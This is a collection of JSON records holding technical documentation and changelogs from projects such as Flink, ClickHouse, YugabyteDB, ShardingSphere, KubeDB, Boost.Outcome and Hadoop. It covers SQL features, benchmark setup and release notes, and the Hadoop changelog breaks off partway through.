``` Flink interprets each row as an `INSERT` to the table, meaning we cannot define a `PRIMARY KEY` over currency. However, it is clear to us (the query developer) that this table has all the necessary information to define a versioned table. Flink can reinterpret this table as a versioned table by defining a which produces an ordered changelog stream with an inferred primary key (currency) and event time (update_time). ```sql -- Define a versioned view CREATE VIEW versioned_rates AS SELECT currency, rate, updatetime -- (1) `updatetime` keeps the event time FROM ( SELECT *, ROW_NUMBER() OVER (PARTITION BY currency -- (2) the inferred unique key `currency` can be a primary key ORDER BY update_time DESC) AS rownum FROM currency_rates) WHERE rownum = 1; -- the view `versioned_rates` will produce a changelog as the following. (changelog kind) update_time currency rate ================ ============= ========= ==== +(INSERT) 09:00:00 Yen 102 +(INSERT) 09:00:00 Euro 114 +(INSERT) 09:00:00 USD 1 +(UPDATE_AFTER) 11:15:00 Euro 119 +(INSERT) 11:45:00 Pounds 107 +(UPDATE_AFTER) 11:49:00 Pounds 108 ``` Flink has a special optimization step that will efficiently transform this query into a versioned table usable in subsequent queries. In general, the results of a query with the following format produces a versioned table: ```sql SELECT [column_list] FROM ( SELECT [column_list], ROW_NUMBER() OVER ([PARTITION BY col1[, col2...]] ORDER BY time_attr DESC) AS rownum FROM table_name) WHERE rownum = 1 ``` Parameter Specification: `ROW_NUMBER()`: Assigns an unique, sequential number to each row, starting with one. `PARTITION BY col1[, col2...]`: Specifies the partition columns, i.e. the deduplicate key. These columns form the primary key of the subsequent versioned table. `ORDER BY time_attr DESC`: Specifies the ordering column, it must be a . `WHERE rownum = 1`: The `rownum = 1` is required for Flink to recognize this query is to generate a versioned table. {{< top >}}" } ]
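Once a versioned table or view such as `versioned_rates` is defined, the usual next step is to join another stream against it using Flink SQL's `FOR SYSTEM_TIME AS OF` event-time temporal join. The sketch below is an illustrative addition, not part of the original page: the probe-side `orders` table, its columns (`order_id`, `currency`, `amount`, `order_time`) and the alias `usd_amount` are all hypothetical.

```sql
-- Hypothetical probe-side table; not defined in the original document.
CREATE TABLE orders (
    order_id   STRING,
    currency   STRING,
    amount     DECIMAL(32, 2),
    order_time TIMESTAMP(3),
    WATERMARK FOR order_time AS order_time
) WITH (...);

-- Event-time temporal join: each order is enriched with the rate that
-- was valid for its currency at the order's event time.
SELECT
    orders.order_id,
    orders.amount * versioned_rates.rate AS usd_amount,
    orders.order_time
FROM orders
LEFT JOIN versioned_rates FOR SYSTEM_TIME AS OF orders.order_time
ON orders.currency = versioned_rates.currency;
```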
{ "category": "App Definition and Development", "file_name": "belllabs.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Bell Labs\" icon: /images/logos/powered-by/belllabs.png hasLink: \"https://www.bell-labs.com/#gref\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "CHANGELOG-v2021.06.23.md", "project_name": "KubeDB by AppsCode", "subcategory": "Database" }
[ { "data": "title: Changelog | KubeDB description: Changelog menu: docs_{{.version}}: identifier: changelog-kubedb-v2021.06.23 name: Changelog-v2021.06.23 parent: welcome weight: 20210623 product_name: kubedb menuname: docs{{.version}} sectionmenuid: welcome url: /docs/{{.version}}/welcome/changelog-v2021.06.23/ aliases: /docs/{{.version}}/CHANGELOG-v2021.06.23/ Prepare for release v0.4.0 (#27) Disable api priority and fairness feature for webhook server (#26) Prepare for release v0.4.0-rc.0 (#25) Update audit lib (#24) Send audit events if analytics enabled Create auditor if license file is provided (#23) Publish audit events (#22) Use kglog helper Use k8s 1.21.0 toolchain (#21) Prepare for release v0.6.0 (#202) Improve Elasticsearch version upgrade with reconciler (#201) Use NSSWrapper for PgUpgrade Command (#200) Prepare for release v0.6.0-rc.0 (#199) Update audit lib (#197) Add MariaDB OpsReq [Restart, Upgrade, Scaling, Volume Expansion, Reconfigure Custom Config] (#179) Postgres Ops Req (Upgrade, Horizontal, Vertical, Volume Expansion, Reconfigure, Reconfigure TLS, Restart) (#193) Skip stash checks if stash CRD doesn't exist (#196) Refactor MongoDB Scale Down Shard (#189) Add timeout for Elasticsearch ops request (#183) Send audit events if analytics enabled Create auditor if license file is provided (#195) Publish audit events (#194) Fix log level issue with klog (#187) Use kglog helper Update Kubernetes toolchain to v1.21.0 (#181) Only restart the changed pods while VerticalScaling Elasticsearch (#174) Add docs badge Postgres DB Container's RunAsGroup As FSGroup (#769) Add fixes to helper method (#768) Use Stash v2021.06.23 Update audit event publisher (#767) Add MariaDB Constants (#766) Update Elasticsearch API to support various node roles including hot-warm-cold (#764) Update for release Stash@v2021.6.18 (#765) Fix locking in ResourceMapper Send audit events if analytics enabled Add auditor to shared Controller (#761) Rename TimeoutSeconds to Timeout in MongoDBOpsRequest (#759) Add timeout for each step of ES ops request (#742) Add MariaDB OpsRequest Types (#743) Update default resource limits for databases (#755) Add UpdateMariaDBOpsRequestStatus function (#727) Add Fields, Constant, Func For Ops Request Postgres (#758) Add Innodb Group Replication Mode (#750) Replace go-bindata with //go:embed (#753) Add HealthCheckInterval constant (#752) Use kglog helper Fix tests (#749) Cleanup dependencies Update crds Update Kubernetes toolchain to v1.21.0 (#746) Add Elasticsearch vertical scaling constants (#741) Prepare for release v0.19.0 (#610) Prepare for release v0.19.0-rc.0 (#609) Use Kubernetes 1.21.1 toolchain (#608) Use kglog helper Cleanup dependencies (#607) Use Kubernetes v1.21.0 toolchain (#606) Use Kubernetes v1.21.0 toolchain (#605) Use Kubernetes v1.21.0 toolchain (#604) Use Kubernetes v1.21.0 toolchain (#603) Use Kubernetes v1.21.0 toolchain (#602) Use Kubernetes v1.21.0 toolchain (#601) Update Kubernetes toolchain to v1.21.0 (#600) Prepare for release v0.19.0 (#503) Prepare for release v0.19.0-rc.0 (#502) Update audit lib (#501) Do not create user credentials when security is disabled (#500) Add support for various node roles for" }, { "data": "(#499) Send audit events if analytics enabled Create auditor if license file is provided (#498) Publish audit events (#497) Skip health check for halted DB (#494) Disable flow control if api is not enabled (#495) Fix log level issue with klog (#496) Limit health checker go-routine for specific DB object (#491) Use kglog helper 
Cleanup glog dependency Update dependencies Update Kubernetes toolchain to v1.21.0 (#492) Prepare for release v2021.06.23 (#317) Prepare for release v2021.06.21-rc.0 (#315) Use Stash v2021.06.23 Use Kubernetes 1.21.1 toolchain (#314) Add support for Elasticsearch v7.13.2 (#313) Support MongoDB Version 4.4.6 (#312) Update Elasticsearch versions to support various node roles (#308) Update for release Stash@v2021.6.18 (#311) Update to MariaDB init docker version 0.2.0 (#310) Fix: Update Ops Request yaml for Reconfigure TLS in Postgres (#307) Use mongodb-exporter v0.20.4 (#305) Update Kubernetes toolchain to v1.21.0 (#302) Add monitoring values to global chart (#301) Prepare for release v0.3.0 (#78) Prepare for release v0.3.0-rc.0 (#77) Update audit lib (#75) Update custom config mount path for MariaDB Cluster (#59) Separate Reconcile functionality in a new function ReconcileNode (#68) Limit Go routines in Health Checker (#73) Send audit events if analytics enabled (#74) Create auditor if license file is provided (#72) Publish audit events (#71) Fix log level issue with klog for MariaDB (#70) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#66) Prepare for release v0.12.0 (#301) Disable api priority and fairness feature for webhook server (#300) Prepare for release v0.12.0-rc.0 (#299) Update audit lib (#298) Send audit events if analytics enabled (#297) Publish audit events (#296) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#294) Prepare for release v0.12.0 (#402) Fix mongodb exporter error (#401) Prepare for release v0.12.0-rc.0 (#400) Update audit lib (#399) Limit go routine in health check (#394) Update TLS args for Exporter (#395) Send audit events if analytics enabled (#398) Create auditor if license file is provided (#397) Publish audit events (#396) Fix log level issue with klog (#393) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#391) Prepare for release v0.12.0 (#393) Prepare for release v0.12.0-rc.0 (#392) Limit Health Checker goroutines (#385) Use gomodules.xyz/password-generator v0.2.7 Update audit library (#390) Send audit events if analytics enabled (#389) Create auditor if license file is provided (#388) Publish audit events (#387) Fix log level issue with klog for mysql (#386) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#383) Prepare for release v0.19.0 (#409) Disable api priority and fairness feature for webhook server (#408) Prepare for release v0.19.0-rc.0 (#407) Update audit lib (#406) Send audit events if analytics enabled (#405) Stop using gomodules.xyz/version Publish audit events (#404) Use kglog helper Update Kubernetes toolchain to" }, { "data": "(#403) Prepare for release v0.6.0 (#203) Disable api priority and fairness feature for webhook server (#202) Prepare for release v0.6.0-rc.0 (#201) Update audit lib (#200) Send audit events if analytics enabled (#199) Create auditor if license file is provided (#198) Publish audit events (#197) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#195) Prepare for release v0.3.0 (#26) Prepare for release v0.3.0-rc.0 (#25) Update Client TLS Path for Postgres (#24) Raft Version Update And Ops Request Fix (#23) Use klog/v2 (#19) Use klog/v2 Prepare for release v0.6.0 (#163) Disable api priority and fairness feature for webhook server (#162) Prepare for release v0.6.0-rc.0 (#161) Update audit lib (#160) Send audit events if analytics enabled (#159) Create auditor if license file is provided (#158) Publish audit events 
(#157) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#155) Prepare for release v0.19.0 (#509) Prepare for release v0.19.0-rc.0 (#508) Run All DB Pod's Container with Custom-UID (#507) Update audit lib (#506) Limit Health Check for Postgres (#504) Send audit events if analytics enabled (#505) Create auditor if license file is provided (#503) Stop using gomodules.xyz/version (#501) Publish audit events (#500) Fix: Log Level Issue with klog (#496) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#492) Prepare for release v0.6.0 (#181) Disable api priority and fairness feature for webhook server (#180) Prepare for release v0.6.0-rc.0 (#179) Update audit lib (#178) Send audit events if analytics enabled (#177) Create auditor if license file is provided (#176) Publish audit events (#175) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#173) Prepare for release v0.12.0 (#326) Disable api priority and fairness feature for webhook server (#325) Prepare for release v0.12.0-rc.0 (#324) Update audit lib (#323) Limit Health Check go-routine Redis (#321) Send audit events if analytics enabled (#322) Create auditor if license file is provided (#320) Add auditor handler Publish audit events (#319) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#317) Prepare for release v0.6.0 (#144) Prepare for release v0.6.0-rc.0 (#143) Remove glog dependency Use kglog helper Update repository config (#142) Use klog/v2 Use Kubernetes v1.21.0 toolchain (#140) Use Kubernetes v1.21.0 toolchain (#139) Use Kubernetes v1.21.0 toolchain (#138) Use Kubernetes v1.21.0 toolchain (#137) Update Kubernetes toolchain to v1.21.0 (#136) Prepare for release v0.4.0 (#125) Prepare for release v0.4.0-rc.0 (#124) Fix locking in ResourceMapper (#123) Update dependencies (#122) Use kglog helper Use klog/v2 Use Kubernetes v1.21.0 toolchain (#120) Use Kubernetes v1.21.0 toolchain (#119) Use Kubernetes v1.21.0 toolchain (#118) Use Kubernetes v1.21.0 toolchain (#117) Update Kubernetes toolchain to v1.21.0 (#116) Fix Elasticsearch status check while creating the client (#114)" } ]
{ "category": "App Definition and Development", "file_name": "limit-by.md", "project_name": "ClickHouse", "subcategory": "Database" }
[ { "data": "slug: /en/sql-reference/statements/select/limit-by sidebar_label: LIMIT BY A query with the `LIMIT n BY expressions` clause selects the first `n` rows for each distinct value of `expressions`. The key for `LIMIT BY` can contain any number of . ClickHouse supports the following syntax variants: `LIMIT [offset_value, ]n BY expressions` `LIMIT n OFFSET offset_value BY expressions` During query processing, ClickHouse selects data ordered by sorting key. The sorting key is set explicitly using an clause or implicitly as a property of the table engine (row order is only guaranteed when using , otherwise the row blocks will not be ordered due to multi-threading). Then ClickHouse applies `LIMIT n BY expressions` and returns the first `n` rows for each distinct combination of `expressions`. If `OFFSET` is specified, then for each data block that belongs to a distinct combination of `expressions`, ClickHouse skips `offsetvalue` number of rows from the beginning of the block and returns a maximum of `n` rows as a result. If `offsetvalue` is bigger than the number of rows in the data block, ClickHouse returns zero rows from the block. :::note `LIMIT BY` is not related to . They can both be used in the same query. ::: If you want to use column numbers instead of column names in the `LIMIT BY` clause, enable the setting . Sample table: ``` sql CREATE TABLE limit_by(id Int, val Int) ENGINE = Memory; INSERT INTO limit_by VALUES (1, 10), (1, 11), (1, 12), (2, 20), (2, 21); ``` Queries: ``` sql SELECT * FROM limit_by ORDER BY id, val LIMIT 2 BY id ``` ``` text idval 1 10 1 11 2 20 2 21 ``` ``` sql SELECT * FROM limit_by ORDER BY id, val LIMIT 1, 2 BY id ``` ``` text idval 1 11 1 12 2 21 ``` The `SELECT * FROM limit_by ORDER BY id, val LIMIT 2 OFFSET 1 BY id` query returns the same result. The following query returns the top 5 referrers for each `domain, device_type` pair with a maximum of 100 rows in total (`LIMIT n BY + LIMIT`). ``` sql SELECT domainWithoutWWW(URL) AS domain, domainWithoutWWW(REFERRER_URL) AS referrer, device_type, count() cnt FROM hits GROUP BY domain, referrer, device_type ORDER BY cnt DESC LIMIT 5 BY domain, device_type LIMIT 100 ```" } ]
{ "category": "App Definition and Development", "file_name": "ddl_create_foreign_table.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: CREATE FOREIGN TABLE statement [YSQL] headerTitle: CREATE FOREIGN TABLE linkTitle: CREATE FOREIGN TABLE description: Use the CREATE FOREIGN TABLE statement to create a foreign table. menu: v2.18: identifier: ddlcreateforeign_table parent: statements type: docs Use the `CREATE FOREIGN TABLE` command to create a foreign table. {{%ebnf%}} createforeigntable {{%/ebnf%}} Create a new foreign table named table_name. If table_name already exists in the specified database, an error will be raised unless the `IF NOT EXISTS` clause is used. The `COLLATE` clause can be used to specify a collation for the column. The `SERVER` clause can be used to specify the name of the foreign server to use. The `OPTIONS` clause specifies options for the foreign table. The permitted option names and values are specific to each foreign data wrapper. The options are validated using the FDWs validator function. Basic example. ```plpgsql yugabyte=# CREATE FOREIGN TABLE mytable (col1 int, col2 int) SERVER myserver OPTIONS (schema 'externalschema', table 'external_table'); ```" } ]
{ "category": "App Definition and Development", "file_name": "v21.4.4.30-stable.md", "project_name": "ClickHouse", "subcategory": "Database" }
[ { "data": "sidebar_position: 1 sidebar_label: 2022 Backported in : Now replicas that are processing the `ALTER TABLE ATTACH PART (). Backported in : Improved performance of `dictGetHierarchy`, `dictIsIn` functions. Added functions `dictGetChildren(dictionary, key)`, `dictGetDescendants(dictionary, key, level)`. Function `dictGetChildren` return all children as an array if indexes. It is a inverse transformation for `dictGetHierarchy`. Function `dictGetDescendants` return all descendants as if `dictGetChildren` was applied `level` times recursively. Zero `level` value is equivalent to infinity. Closes . (). Backported in : Added function `dictGetOrNull`. It works like `dictGet`, but return `Null` in case key was not found in dictionary. Closes . (). Backported in : Add aliases `simpleJSONExtract/simpleJSONHas` to `visitParam/visitParamExtract{UInt, Int, Bool, Float, Raw, String}`. Fixes . (). Backported in : Set `backgroundfetchespool_size` to 8 that is better for production usage with frequent small insertions or slow ZooKeeper cluster. (). Backported in : Raised the threshold on max number of matches in result of the function `extractAllGroupsHorizontal`. (). Backported in : Fixed a bug with unlimited wait for auxiliary AWS requests. (). Backported in : fixed `formatDateTime()` on `DateTime64` and \"%C\" format specifier fixed `toDateTime64()` for large values and non-zero scale. ... (). Backported in : Fix error `Cannot find column in ActionsDAG result` which may happen if subquery uses `untuple`. Fixes . (). Backported in : Remove non-essential details from suggestions in clickhouse-client. This closes . (). Backported in : Fixed `Table .inner_id... doesn't exist` error when selecting from Materialized View after detaching it from Atomic database and attaching back. (). Backported in : Some values were formatted with alignment in center in table cells in `Markdown` format. Not anymore. (). Backported in : Enable the bundled openldap on ppc64le ... ()." } ]
{ "category": "App Definition and Development", "file_name": "sysbench-proxy-norules-test.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"SysBench ShardingSphere-Proxy Empty Rule Performance Test\" weight = 1 +++ Compare the performance of ShardingSphere-Proxy and MySQL Sysbench directly carries out stress testing on the performance of MySQL. Sysbench directly carries out stress testing on ShardingSphere-Proxy (directly connect MySQL). Based on the above two groups of experiments, we can figure out the loss of MySQL when using ShardingSphere-Proxy. Db-related configuration: it is recommended that the memory is larger than the amount of data to be tested, so that the data is stored in the memory hot block, and the rest can be adjusted. ShardingSphere-Proxy-related configuration: it is recommended to use a high-performance, multi-core CPU, and other configurations can be customized. Disable swap partitions on all servers involved in the stress testing. ```shell [mysqld] innodbbufferpoolsize=${MORETHANDATASIZE} innodb-log-file-size=3000000000 innodb-log-files-in-group=5 innodb-flush-log-at-trx-commit=0 innodb-change-buffer-max-size=40 back_log=900 innodbmaxdirtypagespct=75 innodbopenfiles=20480 innodbbufferpool_instances=8 innodbpagecleaners=8 innodbpurgethreads=2 innodbreadio_threads=8 innodbwriteio_threads=8 tableopencache=102400 log_timestamps=system threadcachesize=16384 transaction_isolation=READ-COMMITTED ``` Refer to ```shell -Xmx16g -Xms16g -Xmn8g # Adjust JVM parameters ``` ```yaml databaseName: sharding_db dataSources: ds_0: url: jdbc:mysql://*...:*/test?serverTimezone=UTC&useSSL=false # Parameters can be adjusted appropriately username: test password: connectionTimeoutMilliseconds: 30000 idleTimeoutMilliseconds: 60000 maxLifetimeMilliseconds: 1800000 maxPoolSize: 200 # The maximum ConnPool is set to ${the number of concurrencies in stress testing}, which is consistent with the number of concurrencies in stress testing to shield the impact of additional connections in the process of stress testing. minPoolSize: 200 # The minimum ConnPool is set to ${the number of concurrencies in stress testing}, which is consistent with the number of concurrencies in stress testing to shield the impact of connections initialization in the process of stress testing. rules: [] ``` ```shell sysbench oltpreadwrite --mysql-host=${DBIP} --mysql-port=${DBPORT} --mysql-user=${USER} --mysql-password=${PASSWD} --mysql-db=test --tables=10 --table-size=1000000 --report-interval=10 --time=100 --threads=200 cleanup sysbench oltpreadwrite --mysql-host=${DBIP} --mysql-port=${DBPORT} --mysql-user=${USER} --mysql-password=${PASSWD} --mysql-db=test --tables=10 --table-size=1000000 --report-interval=10 --time=100 --threads=200 prepare ``` ```shell sysbench oltpreadwrite --mysql-host=${DB/PROXYIP} --mysql-port=${DB/PROXYPORT} --mysql-user=${USER} --mysql-password=${PASSWD} --mysql-db=test --tables=10 --table-size=1000000 --report-interval=10 --time=100 --threads=200 run ``` ```shell sysbench 1.0.20 (using bundled LuaJIT 2.1.0-beta2) Running the test with following options: Number of threads: 200 Report intermediate results every 10 second(s) Initializing random number generator from current time Initializing worker threads... Threads started! [ 10s ] thds: 200 tps: 11161.70 qps: 223453.06 (r/w/o: 156451.76/44658.51/22342.80) lat (ms,95%): 27.17 err/s: 0.00 reconn/s: 0.00 ... 
[ 120s ] thds: 200 tps: 11731.00 qps: 234638.36 (r/w/o: 164251.67/46924.69/23462.00) lat (ms,95%): 24.38 err/s: 0.00 reconn/s: 0.00 SQL statistics: queries performed: read: 19560590 # number of reads write: 5588740 # number of writes other: 27943700 # number of other operations (COMMIT etc.) total: 27943700 # the total number transactions: 1397185 (11638.59 per sec.) # number of transactions (per second) queries: 27943700 (232771.76 per sec.) # number of statements executed (per second) ignored errors: 0 (0.00 per sec.) # number of ignored errors (per second) reconnects: 0 (0.00 per sec.) # number of reconnections (per second) General statistics: total time: 120.0463s # total time total number of events: 1397185 # toal number of transactions Latency (ms): min: 5.37 # minimum latency avg: 17.13 # average latency max: 109.75 # maximum latency 95th percentile: 24.83 # average response time of over 95th percentile. sum: 23999546.19 Threads fairness: events (avg/stddev): 6985.9250/34.74 # On average, 6985.9250 events were completed per thread, and the standard deviation is 34.74 execution time (avg/stddev): 119.9977/0.01 # The average time of each thread is 119.9977 seconds, and the standard deviation is 0.01 ``` CPU utilization ratio of the server where ShardingSphere-Proxy resides. It is better to make full use of CPU. I/O of the server disk where the DB resides. The lower the physical read value is, the better. Network IO of the server involved in the stress testing." } ]
{ "category": "App Definition and Development", "file_name": "foreign-try.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "+++ title = \"Extending `BOOSTOUTCOMETRY`\" description = \"How to informing `BOOSTOUTCOMETRY` about foreign Result types.\" tags = [ \"TRY\" ] +++ Outcome's {{% api \"BOOSTOUTCOMETRY(var, expr)\" %}} operation is fully extensible to accept as input any foreign types. It already recognises types matching the {{% api \"concepts::valueorerror<T, E>\" %}} concept, which is to say all types which have: A public `.has_value()` member function which returns a `bool`. In order of preference, a public `.assume_value()`/`.value()` member function. In order of preference, a public `.asfailure()`/`.assumeerror()`/`.error()` member function. This should automatically handle inputs of `std::expected<T, E>`, and many others, including intermixing Boost.Outcome and standalone Outcome within the same translation unit. `BOOSTOUTCOMETRY` has the following free function customisation points: <dl> <dt><code>BOOSTOUTCOMEV2NAMESPACE::</code>{{% api \"tryoperationhasvalue(X)\" %}} <dd>Returns a `bool` which is true if the input to TRY has a value. <dt><code>BOOSTOUTCOMEV2NAMESPACE::</code>{{% api \"tryoperationreturnas(X)\" %}} <dd>Returns a suitable {{% api \"failure_type<EC, EP = void>\" %}} which is returned immediately to cause stack unwind. Ought to preserve rvalue semantics (i.e. if passed an rvalue, move the error state into the failure type). <dt><code>BOOSTOUTCOMEV2NAMESPACE::</code>{{% api \"tryoperationextractvalue(X)\" %}} <dd>Extracts a value type from the input for the `TRY` to set its variable. Ought to preserve rvalue semantics (i.e. if passed an rvalue, move the value). </dl> New overloads of these to support additional input types must be injected into the `BOOSTOUTCOMEV2_NAMESPACE` namespace before the compiler parses the relevant `BOOSTOUTCOMETRY` in order to be found. This is called 'early binding' in the two phase name lookup model in C++. This was chosen over 'late binding', where an `BOOSTOUTCOMETRY` in a templated piece of code could look up overloads introduced after parsing the template containing the `BOOSTOUTCOMETRY`, because it has much lower impact on build times, as binding is done once at the point of parse, instead of on every occasion at the point of instantiation. If you are careful to ensure that you inject the overloads which you need early in the parse of the translation unit, all will be well. Let us work through an applied example. This is a paraphrase of a poorly written pseudo-Expected type which I once encountered in the production codebase of a large multinational. Lots of the code was already using it, and it was weird enough that it couldn't be swapped out for something better easily. {{% snippet \"foreigntry.cpp\" \"foreigntype\" %}} What we would like is for new code to be written using Outcome, but be able to transparently call old code, like this: {{% snippet \"foreign_try.cpp\" \"functions\" %}} Telling Outcome about this weird foreign Expected is straightforward: {{% snippet \"foreigntry.cpp\" \"telloutcome\" %}} And now `BOOSTOUTCOMETRY` works exactly as expected: {{% snippet \"foreign_try.cpp\" \"example\" %}} ... which outputs: ``` new_code(5) returns successful 5 new_code(0) returns failure argument out of domain ```" } ]
{ "category": "App Definition and Development", "file_name": "CHANGELOG.0.15.0.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! --> | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Make ...hbase.io.MapWritable more generic so that it can be included in ...hadoop.io | Minor | io | Jim Kellerman | Jim Kellerman | | | Want to kill a particular task or attempt | Major | . | Owen O'Malley | Enis Soztutar | | | SleepJob | Major | . | Enis Soztutar | Enis Soztutar | | | Add link to irc channel #hadoop | Major | . | Enis Soztutar | Enis Soztutar | | | Add fancy graphs for mapred task statuses | Major | . | Enis Soztutar | Enis Soztutar | | | HDFS should have a NamenodeProtocol to allow secondary namenodes and rebalancing processes to communicate with a primary namenode | Major | . | Hairong Kuang | Hairong Kuang | | | Map output compression codec cannot be set independently of job output compression codec | Major | . | Riccardo Boscolo | Arun C Murthy | | | Code contribution of Kosmos Filesystem implementation of Hadoop Filesystem interface | Major | fs | Sriram Rao | Sriram Rao | | | Allow SOCKS proxy configuration to remotely access the DFS and submit Jobs | Minor | ipc | Christophe Taton | Christophe Taton | | | DFS shell should return a list of nodes for a file saying that where the blocks for these files are located. | Minor | . | Mahadev konar | Mahadev konar | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | organize CHANGES.txt messages into sections for future releases | Major | documentation | Doug Cutting | Doug Cutting | | | Add metrics for failed tasks | Major | . | Devaraj Das | Devaraj Das | | | Make FileStatus a concrete class | Major | fs | Chris Douglas | Chris Douglas | | | Add an option to setReplication method to wait for completion of replication | Major | . | Christian Kunz | Tsz Wo Nicholas Sze | | | Remove LOG members from PendingReplicationBlocks and ReplicationTargetChooser. | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | Add generics to Mapper and Reducer interfaces | Major | . | Owen O'Malley | Tom White | | | Redesign Tool and ToolBase API and releted functionality | Major | util | Enis Soztutar | Enis Soztutar | | | Small cleanup of DistributedFileSystem and DFSClient | Trivial | . | Christophe Taton | Christophe Taton | | | INode refactoring | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | contrib jar file names should include hadoop version number | Major | . | Doug Cutting | Doug Cutting | | | Add toString() methods to some Writable types | Major | io | Andrzej Bialecki | Andrzej Bialecki | | | Small cleanup of DistributedFileSystem and DFSClient (next) | Trivial |" }, { "data": "| Christophe Taton | Christophe Taton | | | IOUtils class | Major | io | Enis Soztutar | Enis Soztutar | | | File name should be represented by a byte array instead of a String | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | Merging Block and BlockInfo classes on name-node. | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | JobTracker should collect statistics of failed map output fetches, and take decisions to reexecute map tasks and/or restart the (possibly faulty) Jetty server on the TaskTracker | Major | . | Devaraj Das | Arun C Murthy | | | Typo issue in the job details JSP page | Trivial | . | Thomas Friol | Thomas Friol | | | JobClient CLI cleanup and improvement | Minor | . | Christophe Taton | Christophe Taton | | | We should log better if something goes wrong with the process fork | Major | . 
| Owen O'Malley | Owen O'Malley | | | Generalize making contrib bin content executable in ant package target | Minor | build | stack | stack | | | Small INodeDirectory enhancement to get all existing INodes components on a path | Trivial | . | Christophe Taton | Christophe Taton | | | Rework the various programs in 'examples' to extend ToolBase | Minor | . | Arun C Murthy | Enis Soztutar | | | Name-node memory size estimates and optimization proposal. | Major | . | Konstantin Shvachko | Konstantin Shvachko | | | Remove DatanodeDescriptor dependency from NetworkTopology | Major | . | Konstantin Shvachko | Hairong Kuang | | | Divide the server and client configurations | Major | conf | Owen O'Malley | Arun C Murthy | | | Test coverage target in build files using clover | Major | build | Nigel Daley | Nigel Daley | | | Remove use of INode.parent in Block CRC upgrade | Major | . | Raghu Angadi | Raghu Angadi | | | Print the diagnostic error messages for FAILED task-attempts to the user console via TaskCompletionEvents | Major | . | Arun C Murthy | Amar Kamat | | | Change priority feature in the job details JSP page misses spaces between each priority link | Trivial | . | Thomas Friol | Thomas Friol | | | Namenode does not need to store storageID and datanodeID persistently | Major | . | Raghu Angadi | Raghu Angadi | | | typo's in dfs webui | Trivial | . | Nigel Daley | Nigel Daley | | | Save the configuration of completed/failed jobs and make them available via the web-ui. | Major | . | Arun C Murthy | Amar Kamat | | | Restructure data node code so that block sending/receiving is seperated from data transfer header handling | Major | . | Hairong Kuang | Hairong Kuang | | | Consider include/exclude files while listing datanodes. | Major | . | Raghu Angadi | Raghu Angadi | | | Design/implement a set of compression benchmarks for the map-reduce framework | Major |" }, { "data": "| Arun C Murthy | Arun C Murthy | | | DFSAdmin. Help messages are missing for -finalizeUpgrade and -metasave. | Blocker | . | Konstantin Shvachko | Lohit Vijayarenu | | | Wildcard input syntax (glob) should support {} | Major | fs | eric baldeschwieler | Hairong Kuang | | | JobConf should warn about the existance of obsolete mapred-default.xml. | Major | conf | Owen O'Malley | Arun C Murthy | | | Constructing a JobConf without a class leads to a very misleading error message. | Minor | . | Ted Dunning | Enis Soztutar | | | Increase the concurrency of transaction logging to edits log | Blocker | . | dhruba borthakur | dhruba borthakur | | | Documentation: improve mapred javadocs | Blocker | documentation | Arun C Murthy | Arun C Murthy | | | Update documentation for hadoop's configuration post HADOOP-785 | Major | documentation | Arun C Murthy | Arun C Murthy | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | constant should be user-configurable: MAX\\COMPLETE\\USER\\JOBS\\IN\\_MEMORY | Major | . | Michael Bieniosek | Michael Bieniosek | | | dfs.datanode.du.reserved semantics being violated | Blocker | . | Hairong Kuang | Hairong Kuang | | | DFS Client should create file when the user creates the file | Major | . | Owen O'Malley | Tsz Wo Nicholas Sze | | | DFSScalability: reduce memory usage of namenode | Major | . | dhruba borthakur | dhruba borthakur | | | Some improvements in progress reporting | Major | . | Devaraj Das | Devaraj Das | | | File locking interface and implementation should be remvoed. 
| Minor | fs | Raghu Angadi | Raghu Angadi | | | DfsTask cache interferes with operation | Minor | util | Chris Douglas | Chris Douglas | | | .sh scripts do not work on Solaris | Minor | scripts | David Biesack | Doug Cutting | | | Hadoop does not run in Cygwin in Windows | Critical | scripts | Tsz Wo Nicholas Sze | Tsz Wo Nicholas Sze | | | TestDFSUpgrade some times fails with an assert | Major | . | Raghu Angadi | Enis Soztutar | | | GenericWritable should use ReflectionUtils.newInstance to avoid problems with classloaders | Major | io | Owen O'Malley | Enis Soztutar | | | Task Trackers fail to launch tasks when they have relative log directories configured | Major | . | Owen O'Malley | Owen O'Malley | | | MapWritable and SortedMapWritable - Writable problems | Major | io | Jim Kellerman | Jim Kellerman | | | HDFS does not record the blocksize for a file | Major | . | Sameer Paranjpye | dhruba borthakur | | | ConnectException in TaskTracker Child | Major | . | Srikanth Kakani | Doug Cutting | | | Task.moveTaskOutputs is escaping special characters in output filenames | Critical |" }, { "data": "| Frdric Bertin | Frdric Bertin | | | TestIPC and TestRPC should use dynamically allocated ports | Major | ipc | Doug Cutting | Doug Cutting | | | Incorrect Value type in MRBench (SmallJobs) | Blocker | . | Devaraj Das | Devaraj Das | | | listTables() returns duplicate tables | Major | . | Andrew 